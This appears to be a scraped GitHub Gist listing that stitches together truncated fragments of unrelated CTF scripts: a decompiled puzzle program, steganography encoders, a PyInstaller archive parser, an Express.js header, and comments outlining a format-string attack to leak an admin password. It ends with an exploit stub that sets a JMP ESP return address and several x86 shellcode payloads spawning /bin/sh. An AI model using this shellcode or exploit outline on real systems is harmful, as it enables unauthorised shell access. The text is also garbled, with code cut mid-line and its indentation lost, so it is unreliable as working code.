Skip to content

Instantly share code, notes, and snippets.

# 2016.06.25 20:27:03 AEST
#Embedded file name: digital_fortrees.py
import urllib2
def main():
print " /\\\n /`:\\\n /`'`:\\\n /`'`'`:\\\n /`'`'`'`:\\\n /`'`'`'`'`:\\\n |`'`'`'`:|\n _ _ _ _ _ |] ,-. :|_ _ _ _\n ||| || || || | | |_| ||| || || || |\n |`' `' `' `'.| | _'=' |`' `' `' `'.|\n : .:; |'-' : .:;\n \\-..____..:/ _ _ _ _ _ _| _ _'-\\-..____..:/\n :--------:_,' || || || || || || || `.::--------:\n |] .:|:. `' `'_`' `' `' `' `' | '-' .:|\n | ,-. .[|:._ '-' ____ ___ | ,-.'-|\n | | | .:|'--'_ ,'____`. '---' | | |.:|\n | |_| .:|:.'--' ()/,| |`|`.\\() __ | |_|.:|\n | '=' .:|:.
import os
def gothrough():
key = 1
roomtogo = [r for r in os.listdir(os.curdir)if os.path.isdir(r)]
for room in roomtogo:
key *= int(room)
os.system("start cmd /k echo Room number " + room + ": get key part")
# >>> 1000004059 * 1000004099 * 1000004119
if (key == 1000012277050240711531267079):
import os
import errno
import math
def draw():
current = 2
check_map("2")
print 'Press Ctrl + C to stop draw map'
while 1:
#!/usr/bin/python
# step 1: bruteforce
# our first stage is to brute force how many "A"'s I need
# to leak the admin pw.
# step 2: leak the pwd
# at this point, we control fully one %s pointer
# which is used in the data leak. we use this to leak
# the admin blog password
# step 3: authenticate and read the flag.
#!/usr/bin/python
from PIL import Image
import sys
from re import sub
import base64
if len(sys.argv) != 3:
print "usage: ./e.py [in_img] [in_data] saves to out.png"
sys.exit(0)
#!/usr/bin/python
from PIL import Image
import sys
from re import sub
print " ** SUPER SEKRIT DECRYPTOR DO NOT DISTRIBUTE ** "
def decode(text):
return sub(r'(\d+)(\D)', lambda m: m.group(2) * int(m.group(1)),text)
var http = require('http');
var express = require('express');
var path = require('path');
var cookieParser = require('cookie-parser');
var bodyParser = require('body-parser');
var crypto = require('crypto');
var secrets = require('./secrets');
var app = express();
#!/usr/bin/python
import string
import zlib
import os
import sys
base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
crc32_array = {}
import os
import struct
import marshal
import zlib
import sys
import imp
import types
class CTOCEntry:
def __init__(self, position, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name):
#!/usr/bin/python
# PLOTTING
# JMPESP = "\xBB\xBB\xBB\xBB"
JMPESP = "\x9f\x85\x04\x08"
FORWARD = "\xEB\xF6\xCC\xCC"
# PAYLOAD = "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90"
# PAYLOAD = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90"
PAYLOAD = "\x31\xc0\x89\xc2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\xCC"
# PAYLOAD = "\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xCC\xCC\xCC\xCC"